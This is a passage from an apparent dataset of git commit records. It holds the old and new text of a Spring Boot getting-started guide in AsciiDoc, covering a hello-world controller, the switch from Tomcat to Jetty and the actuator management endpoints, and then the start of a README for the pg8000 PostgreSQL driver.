part.\n\nNOTE: Spring Boot doesn't generate code or make edits to your files. Instead, when you start up your application, Spring Boot dynamically wires up beans and settings and applies them to your application context.\n\n== Create a simple web application\nNow you can create a web controller for a simple web application.\n\n`src\/main\/java\/hello\/HelloController.java`\n[source,java]\n----\ninclude::initial\/src\/main\/java\/hello\/HelloController.java[]\n----\n \nThe class is flagged as a `@RestController`, meaning it's ready for use by Spring MVC to handle web requests. `@RequestMapping` maps `\/` to the `index()` method. When invoked from a browser or using curl on the command line, the method returns pure text. That's because `@RestController` combines `@Controller` and `@ResponseBody`, two annotations that results in web requests returning data rather than a view.\n\n== Create an Application class\nHere you create an `Application` class with the components:\n\n`src\/main\/java\/hello\/Application.java`\n[source,java]\n----\ninclude::initial\/src\/main\/java\/hello\/Application.java[]\n----\n \n- `@Configuration` tags the class as a source of bean definitions for the application context.\n- `@EnableAutoConfiguration` tells Spring Boot to start adding beans based on classpath settings, other beans, and various property settings.\n- Normally you would add `@EnableWebMvc` for a Spring MVC app, but Spring Boot adds it automatically when it sees **spring-webmvc** on the classpath. This flags the application as a web application and activates key behaviors such as setting up a `DispatcherServlet`.\n- `@ComponentScan` tells Spring to look for other components, configurations, and services in the the `hello` package, allowing it to find the `HelloController`.\n\nThe `main()` method uses Spring Boot's `SpringApplication.run()` method to launch an application. Did you notice that there wasn't a single line of XML? No **web.xml** file either. This web application is 100% pure Java and you didn't have to deal with configuring any plumbing or infrastructure.\n\nThe `run()` method returns an `ApplicationContext` and this application then retrieves all the beans that were created either by your app or were automatically added thanks to Spring Boot. It sorts them and prints them out.\n\n== Run the application\nTo run the application, execute:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nYou should see some output like this:\n\n....\nLet's inspect the beans provided by Spring Boot:\napplication\nbeanNameHandlerMapping\ndefaultServletHandlerMapping\ndispatcherServlet\nembeddedServletContainerCustomizerBeanPostProcessor\nhandlerExceptionResolver\nhelloController\nhttpRequestHandlerAdapter\nmessageSource\nmvcContentNegotiationManager\nmvcConversionService\nmvcValidator\norg.springframework.boot.autoconfigure.MessageSourceAutoConfiguration\norg.springframework.boot.autoconfigure.PropertyPlaceholderAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$DispatcherServletConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$EmbeddedTomcat\norg.springframework.boot.autoconfigure.web.ServerPropertiesAutoConfiguration\norg.springframework.boot.context.embedded.properties.ServerProperties\norg.springframework.context.annotation.ConfigurationClassPostProcessor.enhancedConfigurationProcessor\norg.springframework.context.annotation.ConfigurationClassPostProcessor.importAwareProcessor\norg.springframework.context.annotation.internalAutowiredAnnotationProcessor\norg.springframework.context.annotation.internalCommonAnnotationProcessor\norg.springframework.context.annotation.internalConfigurationAnnotationProcessor\norg.springframework.context.annotation.internalRequiredAnnotationProcessor\norg.springframework.web.servlet.config.annotation.DelegatingWebMvcConfiguration\npropertySourcesBinder\npropertySourcesPlaceholderConfigurer\nrequestMappingHandlerAdapter\nrequestMappingHandlerMapping\nresourceHandlerMapping\nsimpleControllerHandlerAdapter\ntomcatEmbeddedServletContainerFactory\nviewControllerHandlerMapping\n....\n\nYou can clearly see **org.springframework.boot.autoconfigure** beans. There is also a `tomcatEmbeddedServletContainerFactory`.\n\nCheck out the service.\n\n....\n$ curl localhost:8080\nGreetings from Spring Boot!\n....\n\n== Switch from Tomcat to Jetty\nWhat if you prefer Jetty over Tomcat? Jetty and Tomcat are both compliant servlet containers, so it should be easy to switch. With Spring Boot, it is!\n\nChange your `build.gradle` to exclude Tomcat then add Jetty to the list of dependencies:\n\n[source,groovy]\n----\n compile(\"org.springframework.boot:spring-boot-starter-web:0.5.0.M6\") {\n exclude module: \"spring-boot-starter-tomcat\"\n }\n compile(\"org.springframework.boot:spring-boot-starter-jetty:0.5.0.M6\")\n----\n\nIf you are using Maven, the changes look like this:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-web<\/artifactId>\n <exclusions>\n <exclusion>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-tomcat<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-jetty<\/artifactId>\n <\/dependency>\n----\n\nThis change isn't about comparing Tomcat vs. Jetty. Instead, it demonstrates how Spring Boot reacts to what is on your classpath.\n\nAs you can see below, the code is the same as before:\n\n`src\/main\/java\/hello\/Application.java`\n[source,java]\n----\ninclude::complete\/src\/main\/java\/hello\/Application.java[]\n----\n \n\n== Re-run the application\n\nRun the app again:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nNow check out the output:\n\n....\nLet's inspect the beans provided by Spring Boot:\napplication\nbeanNameHandlerMapping\ndefaultServletHandlerMapping\ndispatcherServlet\nembeddedServletContainerCustomizerBeanPostProcessor\nfaviconHandlerMapping\nfaviconRequestHandler\nhandlerExceptionResolver\nhelloController\nhiddenHttpMethodFilter\nhttpRequestHandlerAdapter\njettyEmbeddedServletContainerFactory\nmessageSource\nmvcContentNegotiationManager\nmvcConversionService\nmvcValidator\norg.springframework.boot.autoconfigure.MessageSourceAutoConfiguration\norg.springframework.boot.autoconfigure.PropertyPlaceholderAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$DispatcherServletConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$EmbeddedJetty\norg.springframework.boot.autoconfigure.web.ServerPropertiesAutoConfiguration\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter$FaviconConfiguration\norg.springframework.boot.context.embedded.properties.ServerProperties\norg.springframework.context.annotation.ConfigurationClassPostProcessor.enhancedConfigurationProcessor\norg.springframework.context.annotation.ConfigurationClassPostProcessor.importAwareProcessor\norg.springframework.context.annotation.internalAutowiredAnnotationProcessor\norg.springframework.context.annotation.internalCommonAnnotationProcessor\norg.springframework.context.annotation.internalConfigurationAnnotationProcessor\norg.springframework.context.annotation.internalRequiredAnnotationProcessor\norg.springframework.web.servlet.config.annotation.DelegatingWebMvcConfiguration\npropertySourcesBinder\npropertySourcesPlaceholderConfigurer\nrequestMappingHandlerAdapter\nrequestMappingHandlerMapping\nresourceHandlerMapping\nsimpleControllerHandlerAdapter\nviewControllerHandlerMapping\n....\n\nThere is little change from the previous output, except there is no longer a `tomcatEmbeddedServletContainerFactory`. Instead, there is a new `jettyEmbeddedServletContainer`. \n\nOtherwise, everything is the same, as it should be. Most beans listed above provide Spring MVC's production-grade features. Simply swapping one part, the servlet container, shouldn't cause a system-wide ripple.\n\n== Add production-grade services\nIf you are building a web site for your business, you probably need to add some management services. Spring Boot provides several out of the box with its https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-actuator\/README.md[actuator module], such as health, audits, beans, and more.\n\nAdd this to your build file's list of dependencies:\n\n[source,groovy]\n----\n compile(\"org.springframework.boot:spring-boot-starter-actuator:0.5.0.M6\")\n----\n\nIf you are using Maven, add this to your list of dependencies:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n <\/dependency>\n----\n\nThen restart the app:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nYou will see a new set of RESTful end points added to the application. These are management services provided by Spring Boot.\n\n....\n2013-08-01 08:03:42.592 INFO 43851 ... Mapped \"{[\/error],methods=[],params=[],headers=[],consumes=[],produces=[],custom=[]}\" onto public java.util.Map<java.lang.String, java.lang.Object> org.springframework.boot.ops.web.BasicErrorController.error(javax.servlet.http.HttpServletRequest)\n2013-08-01 08:03:42.592 INFO 43851 ... Mapped \"{[\/error],methods=[],params=[],headers=[],consumes=[],produces=[text\/html],custom=[]}\" onto public org.springframework.web.servlet.ModelAndView org.springframework.boot.ops.web.BasicErrorController.errorHtml(javax.servlet.http.HttpServletRequest)\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/env] onto handler of type [class org.springframework.boot.ops.endpoint.EnvironmentEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/health] onto handler of type [class org.springframework.boot.ops.endpoint.HealthEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/beans] onto handler of type [class org.springframework.boot.ops.endpoint.BeansEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/info] onto handler of type [class org.springframework.boot.ops.endpoint.InfoEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/metrics] onto handler of type [class org.springframework.boot.ops.endpoint.MetricsEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/trace] onto handler of type [class org.springframework.boot.ops.endpoint.TraceEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/dump] onto handler of type [class org.springframework.boot.ops.endpoint.DumpEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/shutdown] onto handler of type [class org.springframework.boot.ops.endpoint.ShutdownEndpoint]\n....\n\nThey include: errors, http:\/\/localhost:8080\/env[environment], http:\/\/localhost:8080\/health[health], http:\/\/localhost:8080\/beans[beans], http:\/\/localhost:8080\/info[info], http:\/\/localhost:8080\/metrics[metrics], http:\/\/localhost:8080\/trace[trace], http:\/\/localhost:8080\/dump[dump], and shutdown.\n\nIt's easy to check the health of the app.\n\n----\n$ curl localhost:8080\/health\nok\n----\n\nYou can invoke shutdown through curl.\n\n----\n$ curl -X POST localhost:8080\/shutdown\n----\n\nThe response shows that shutdown through REST is currently disabled by default:\n----\n{\"message\":\"Shutdown not enabled, sorry.\"}\n----\n\nWhew! You probably don't want that until you are ready to turn on proper security settings, if at all.\n\nFor more details about each of these REST points and how you can tune their settings with an `application.properties` file, check out the {spring-boot}[Spring Boot] project.\n\n== View Spring Boot's starters\nYou have seen some of Spring Boot's **starters**. You can see them all https:\/\/github.com\/spring-projects\/spring-boot\/tree\/master\/spring-boot-starters[here].\n\n== JAR support and Groovy support\nThe last example showed how Spring Boot makes it easy to wire beans you may not be aware that you need. And it showed how to turn on convenient management services.\n\nBut Spring Boot does yet more. It supports not only traditional WAR file deployments, but also makes it easy to put together executable JARs thanks to Spring Boot's loader module. The various guides demonstrate this dual support through the `spring-boot-gradle-plugin` and `spring-boot-maven-plugin`.\n\nOn top of that, Spring Boot also has Groovy support, allowing you to build Spring MVC web apps with as little as a single file.\n\nCreate a new file called **app.groovy** and put the following code in it:\n\n[source,groovy]\n----\n@RestController\nclass ThisWillActuallyRun {\n\n @RequestMapping(\"\/\")\n String home() {\n return \"Hello World!\"\n }\n\n}\n----\n\nNOTE: It doesn't matter where the file is. You can even fit an application that small inside a https:\/\/twitter.com\/rob_winch\/status\/364871658483351552[single tweet]!\n\nNext, https:\/\/github.com\/spring-projects\/spring-boot#installing-the-cli[install Spring Boot's CLI].\n\nRun it as follows:\n\n----\n$ spring run app.groovy\n----\n\nNOTE: This assumes you shut down the previous application, to avoid a port collision.\n\nFrom a different terminal window:\n----\n$ curl localhost:8080\nHello World!\n----\n\nSpring Boot does this by dynamically adding key annotations to your code and leveraging http:\/\/groovy.codehaus.org\/Grape[Groovy Grapes] to pull down needed libraries to make the app run.\n\n== Summary\nCongratulations! You built a simple web application with Spring Boot and learned how it can ramp up your development pace. You also turned on some handy production services.\nThis is only a small sampling of what Spring Boot can do. Checkout http:\/\/projects.spring.io\/spring-boot\/docs\/README.html[Spring Boot's README]\nif you want to dig deeper.\n","old_contents":":spring_boot_version: 0.5.0.M6\n:spring-boot: https:\/\/github.com\/spring-projects\/spring-boot\n:toc:\n:icons: font\n:source-highlighter: prettify\n:project_id: gs-spring-boot\nThis guide provides a sampling of how {spring-boot}[Spring Boot] helps you accelerate and facilitate application development. As you read more Spring Getting Started guides, you will see more use cases for Spring Boot.\nIt is meant to give you a quick taste of Spring Boot. If you want to create your own Spring Boot-based project, visit \nhttp:\/\/start.spring.io\/[Spring Initializr], fill in your project details, pick your options, and you can download either\na Maven build file, or a bundled up project as a zip file.\n\n== What you'll build\nYou'll build a simple web application with Spring Boot and add some useful services to it.\n\n== What you'll need\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/prereq_editor_jdk_buildtools.adoc[]\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/how_to_complete_this_guide.adoc[]\n\n\n[[scratch]]\n== Set up the project\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/build_system_intro.adoc[]\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/create_directory_structure_hello.adoc[]\n\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/create_both_builds.adoc[]\n\n`build.gradle`\n\/\/ AsciiDoc source formatting doesn't support groovy, so using java instead\n[source,java]\n----\ninclude::initial\/build.gradle[]\n----\n\n== Learn what you can do with Spring Boot\n\nSpring Boot offers a fast way to build applications. It looks at your classpath and at beans you have configured, makes reasonable assumptions about what you're missing, and adds it. With Spring Boot you can focus more on business features and less on infrastructure.\n\nFor example:\n\n- Got Spring MVC? There are several specific beans you almost always need, and Spring Boot adds them automatically. A Spring MVC app also needs a servlet container, so Spring Boot automatically configures embedded Tomcat.\n- Got Jetty? If so, you probably do NOT want Tomcat, but instead embedded Jetty. Spring Boot handles that for you.\n- Got Thymeleaf? There are a few beans that must always be added to your application context; Spring Boot adds them for you.\n\nThese are just a few examples of the automatic configuration Spring Boot provides. At the same time, Spring Boot doesn't get in your way. For example, if Thymeleaf is on your path, Spring Boot adds a `SpringTemplateEngine` to your application context automatically. But if you define your own `SpringTemplateEngine` with your own settings, then Spring Boot won't add one. This leaves you in control with little effort on your part.\n\nNOTE: Spring Boot doesn't generate code or make edits to your files. Instead, when you start up your application, Spring Boot dynamically wires up beans and settings and applies them to your application context.\n\n== Create a simple web application\nNow you can create a web controller for a simple web application.\n\n`src\/main\/java\/hello\/HelloController.java`\n[source,java]\n----\ninclude::initial\/src\/main\/java\/hello\/HelloController.java[]\n----\n \nThe class is flagged as a `@RestController`, meaning it's ready for use by Spring MVC to handle web requests. `@RequestMapping` maps `\/` to the `index()` method. When invoked from a browser or using curl on the command line, the method returns pure text. That's because `@RestController` combines `@Controller` and `@ResponseBody`, two annotations that results in web requests returning data rather than a view.\n\n== Create an Application class\nHere you create an `Application` class with the components:\n\n`src\/main\/java\/hello\/Application.java`\n[source,java]\n----\ninclude::initial\/src\/main\/java\/hello\/Application.java[]\n----\n \n- `@Configuration` tags the class as a source of bean definitions for the application context.\n- `@EnableAutoConfiguration` tells Spring Boot to start adding beans based on classpath settings, other beans, and various property settings.\n- Normally you would add `@EnableWebMvc` for a Spring MVC app, but Spring Boot adds it automatically when it sees **spring-webmvc** on the classpath. This flags the application as a web application and activates key behaviors such as setting up a `DispatcherServlet`.\n- `@ComponentScanning` tells Spring to look for other components, configurations, and services in the the `hello` package, allowing it to find the `HelloController`.\n\nThe `main()` method uses Spring Boot's `SpringApplication.run()` method to launch an application. Did you notice that there wasn't a single line of XML? No **web.xml** file either. This web application is 100% pure Java and you didn't have to deal with configuring any plumbing or infrastructure.\n\nThe `run()` method returns an `ApplicationContext` and this application then retrieves all the beans that were created either by your app or were automatically added thanks to Spring Boot. It sorts them and prints them out.\n\n== Run the application\nTo run the application, execute:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nYou should see some output like this:\n\n....\nLet's inspect the beans provided by Spring Boot:\napplication\nbeanNameHandlerMapping\ndefaultServletHandlerMapping\ndispatcherServlet\nembeddedServletContainerCustomizerBeanPostProcessor\nhandlerExceptionResolver\nhelloController\nhttpRequestHandlerAdapter\nmessageSource\nmvcContentNegotiationManager\nmvcConversionService\nmvcValidator\norg.springframework.boot.autoconfigure.MessageSourceAutoConfiguration\norg.springframework.boot.autoconfigure.PropertyPlaceholderAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$DispatcherServletConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$EmbeddedTomcat\norg.springframework.boot.autoconfigure.web.ServerPropertiesAutoConfiguration\norg.springframework.boot.context.embedded.properties.ServerProperties\norg.springframework.context.annotation.ConfigurationClassPostProcessor.enhancedConfigurationProcessor\norg.springframework.context.annotation.ConfigurationClassPostProcessor.importAwareProcessor\norg.springframework.context.annotation.internalAutowiredAnnotationProcessor\norg.springframework.context.annotation.internalCommonAnnotationProcessor\norg.springframework.context.annotation.internalConfigurationAnnotationProcessor\norg.springframework.context.annotation.internalRequiredAnnotationProcessor\norg.springframework.web.servlet.config.annotation.DelegatingWebMvcConfiguration\npropertySourcesBinder\npropertySourcesPlaceholderConfigurer\nrequestMappingHandlerAdapter\nrequestMappingHandlerMapping\nresourceHandlerMapping\nsimpleControllerHandlerAdapter\ntomcatEmbeddedServletContainerFactory\nviewControllerHandlerMapping\n....\n\nYou can clearly see **org.springframework.boot.autoconfigure** beans. There is also a `tomcatEmbeddedServletContainerFactory`.\n\nCheck out the service.\n\n....\n$ curl localhost:8080\nGreetings from Spring Boot!\n....\n\n== Switch from Tomcat to Jetty\nWhat if you prefer Jetty over Tomcat? Jetty and Tomcat are both compliant servlet containers, so it should be easy to switch. With Spring Boot, it is!\n\nChange your `build.gradle` to exclude Tomcat then add Jetty to the list of dependencies:\n\n[source,groovy]\n----\n compile(\"org.springframework.boot:spring-boot-starter-web:0.5.0.M6\") {\n exclude module: \"spring-boot-starter-tomcat\"\n }\n compile(\"org.springframework.boot:spring-boot-starter-jetty:0.5.0.M6\")\n----\n\nIf you are using Maven, the changes look like this:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-web<\/artifactId>\n <exclusions>\n <exclusion>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-tomcat<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-jetty<\/artifactId>\n <\/dependency>\n----\n\nThis change isn't about comparing Tomcat vs. Jetty. Instead, it demonstrates how Spring Boot reacts to what is on your classpath.\n\nAs you can see below, the code is the same as before:\n\n`src\/main\/java\/hello\/Application.java`\n[source,java]\n----\ninclude::complete\/src\/main\/java\/hello\/Application.java[]\n----\n \n\n== Re-run the application\n\nRun the app again:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nNow check out the output:\n\n....\nLet's inspect the beans provided by Spring Boot:\napplication\nbeanNameHandlerMapping\ndefaultServletHandlerMapping\ndispatcherServlet\nembeddedServletContainerCustomizerBeanPostProcessor\nfaviconHandlerMapping\nfaviconRequestHandler\nhandlerExceptionResolver\nhelloController\nhiddenHttpMethodFilter\nhttpRequestHandlerAdapter\njettyEmbeddedServletContainerFactory\nmessageSource\nmvcContentNegotiationManager\nmvcConversionService\nmvcValidator\norg.springframework.boot.autoconfigure.MessageSourceAutoConfiguration\norg.springframework.boot.autoconfigure.PropertyPlaceholderAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$DispatcherServletConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$EmbeddedJetty\norg.springframework.boot.autoconfigure.web.ServerPropertiesAutoConfiguration\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter$FaviconConfiguration\norg.springframework.boot.context.embedded.properties.ServerProperties\norg.springframework.context.annotation.ConfigurationClassPostProcessor.enhancedConfigurationProcessor\norg.springframework.context.annotation.ConfigurationClassPostProcessor.importAwareProcessor\norg.springframework.context.annotation.internalAutowiredAnnotationProcessor\norg.springframework.context.annotation.internalCommonAnnotationProcessor\norg.springframework.context.annotation.internalConfigurationAnnotationProcessor\norg.springframework.context.annotation.internalRequiredAnnotationProcessor\norg.springframework.web.servlet.config.annotation.DelegatingWebMvcConfiguration\npropertySourcesBinder\npropertySourcesPlaceholderConfigurer\nrequestMappingHandlerAdapter\nrequestMappingHandlerMapping\nresourceHandlerMapping\nsimpleControllerHandlerAdapter\nviewControllerHandlerMapping\n....\n\nThere is little change from the previous output, except there is no longer a `tomcatEmbeddedServletContainerFactory`. Instead, there is a new `jettyEmbeddedServletContainer`. \n\nOtherwise, everything is the same, as it should be. Most beans listed above provide Spring MVC's production-grade features. Simply swapping one part, the servlet container, shouldn't cause a system-wide ripple.\n\n== Add production-grade services\nIf you are building a web site for your business, you probably need to add some management services. Spring Boot provides several out of the box with its https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-actuator\/README.md[actuator module], such as health, audits, beans, and more.\n\nAdd this to your build file's list of dependencies:\n\n[source,groovy]\n----\n compile(\"org.springframework.boot:spring-boot-starter-actuator:0.5.0.M6\")\n----\n\nIf you are using Maven, add this to your list of dependencies:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n <\/dependency>\n----\n\nThen restart the app:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nYou will see a new set of RESTful end points added to the application. These are management services provided by Spring Boot.\n\n....\n2013-08-01 08:03:42.592 INFO 43851 ... Mapped \"{[\/error],methods=[],params=[],headers=[],consumes=[],produces=[],custom=[]}\" onto public java.util.Map<java.lang.String, java.lang.Object> org.springframework.boot.ops.web.BasicErrorController.error(javax.servlet.http.HttpServletRequest)\n2013-08-01 08:03:42.592 INFO 43851 ... Mapped \"{[\/error],methods=[],params=[],headers=[],consumes=[],produces=[text\/html],custom=[]}\" onto public org.springframework.web.servlet.ModelAndView org.springframework.boot.ops.web.BasicErrorController.errorHtml(javax.servlet.http.HttpServletRequest)\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/env] onto handler of type [class org.springframework.boot.ops.endpoint.EnvironmentEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/health] onto handler of type [class org.springframework.boot.ops.endpoint.HealthEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/beans] onto handler of type [class org.springframework.boot.ops.endpoint.BeansEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/info] onto handler of type [class org.springframework.boot.ops.endpoint.InfoEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/metrics] onto handler of type [class org.springframework.boot.ops.endpoint.MetricsEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/trace] onto handler of type [class org.springframework.boot.ops.endpoint.TraceEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/dump] onto handler of type [class org.springframework.boot.ops.endpoint.DumpEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/shutdown] onto handler of type [class org.springframework.boot.ops.endpoint.ShutdownEndpoint]\n....\n\nThey include: errors, http:\/\/localhost:8080\/env[environment], http:\/\/localhost:8080\/health[health], http:\/\/localhost:8080\/beans[beans], http:\/\/localhost:8080\/info[info], http:\/\/localhost:8080\/metrics[metrics], http:\/\/localhost:8080\/trace[trace], http:\/\/localhost:8080\/dump[dump], and shutdown.\n\nIt's easy to check the health of the app.\n\n----\n$ curl localhost:8080\/health\nok\n----\n\nYou can invoke shutdown through curl.\n\n----\n$ curl -X POST localhost:8080\/shutdown\n----\n\nThe response shows that shutdown through REST is currently disabled by default:\n----\n{\"message\":\"Shutdown not enabled, sorry.\"}\n----\n\nWhew! You probably don't want that until you are ready to turn on proper security settings, if at all.\n\nFor more details about each of these REST points and how you can tune their settings with an `application.properties` file, check out the {spring-boot}[Spring Boot] project.\n\n== View Spring Boot's starters\nYou have seen some of Spring Boot's **starters**. You can see them all https:\/\/github.com\/spring-projects\/spring-boot\/tree\/master\/spring-boot-starters[here].\n\n== JAR support and Groovy support\nThe last example showed how Spring Boot makes it easy to wire beans you may not be aware that you need. And it showed how to turn on convenient management services.\n\nBut Spring Boot does yet more. It supports not only traditional WAR file deployments, but also makes it easy to put together executable JARs thanks to Spring Boot's loader module. The various guides demonstrate this dual support through the `spring-boot-gradle-plugin` and `spring-boot-maven-plugin`.\n\nOn top of that, Spring Boot also has Groovy support, allowing you to build Spring MVC web apps with as little as a single file.\n\nCreate a new file called **app.groovy** and put the following code in it:\n\n[source,groovy]\n----\n@RestController\nclass ThisWillActuallyRun {\n\n @RequestMapping(\"\/\")\n String home() {\n return \"Hello World!\"\n }\n\n}\n----\n\nNOTE: It doesn't matter where the file is. You can even fit an application that small inside a https:\/\/twitter.com\/rob_winch\/status\/364871658483351552[single tweet]!\n\nNext, https:\/\/github.com\/spring-projects\/spring-boot#installing-the-cli[install Spring Boot's CLI].\n\nRun it as follows:\n\n----\n$ spring run app.groovy\n----\n\nNOTE: This assumes you shut down the previous application, to avoid a port collision.\n\nFrom a different terminal window:\n----\n$ curl localhost:8080\nHello World!\n----\n\nSpring Boot does this by dynamically adding key annotations to your code and leveraging http:\/\/groovy.codehaus.org\/Grape[Groovy Grapes] to pull down needed libraries to make the app run.\n\n== Summary\nCongratulations! You built a simple web application with Spring Boot and learned how it can ramp up your development pace. You also turned on some handy production services.\nThis is only a small sampling of what Spring Boot can do. Checkout http:\/\/projects.spring.io\/spring-boot\/docs\/README.html[Spring Boot's README]\nif you want to dig deeper.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b6c0d02e22d3af1acf0b27a7c044decaf3fe9756","subject":"README: Add link to PostgreSQL JSON page","message":"README: Add link to PostgreSQL JSON page\n","repos":"tlocke\/pg8000","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= pg8000\n:toc: preamble\n\npg8000 is a pure-link:http:\/\/www.python.org\/[Python]\nhttp:\/\/www.postgresql.org\/[PostgreSQL] driver that complies with\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DB-API 2.0]. It is tested on Python\nversions 3.6+, on CPython and PyPy, and PostgreSQL versions 9.5+.\npg8000's name comes from the belief that it is probably about the 8000th\nPostgreSQL interface for Python. pg8000 is distributed under the BSD 3-clause\nlicense.\n\nAll bug reports, feature requests and contributions are welcome at\nhttp:\/\/github.com\/tlocke\/pg8000\/.\n\nimage::https:\/\/github.com\/tlocke\/pg8000\/workflows\/pg8000\/badge.svg[Build Status]\n\n\n== Installation\n\nTo install pg8000 using `pip` type:\n\n`pip install pg8000`\n\n\n== Native API Interactive Examples\n\npg8000 comes with two APIs, the native pg8000 API and the DB-API 2.0 standard\nAPI. These are the examples for the native API, and the DB-API 2.0 examples\nfollow in the next section.\n\n\n=== Basic Example\n\nImport pg8000, connect to the database, create a table, add some rows and then\nquery the table:\n\n[source,python]\n----\n>>> import pg8000.native\n>>>\n>>> # Connect to the database with user name postgres\n>>>\n>>> con = pg8000.native.Connection(\"postgres\", password=\"cpsnow\")\n>>>\n>>> # Create a temporary table\n>>>\n>>> con.run(\"CREATE TEMPORARY TABLE book (id SERIAL, title TEXT)\")\n[]\n>>>\n>>> # Populate the table\n>>>\n>>> for title in (\"Ender's Game\", \"The Magus\"):\n... con.run(\"INSERT INTO book (title) VALUES (:title)\", title=title)\n[]\n[]\n>>>\n>>> # Print all the rows in the table\n>>>\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n\n----\n\n\n=== Transactions\n\nHere's how to run groups of SQL statements in a\nhttps:\/\/www.postgresql.org\/docs\/current\/tutorial-transactions.html[transaction]:\n\n----\n>>> con.run(\"START TRANSACTION\")\n[]\n>>> con.run(\"INSERT INTO book (title) VALUES (:title)\", title=\"Phineas Finn\") 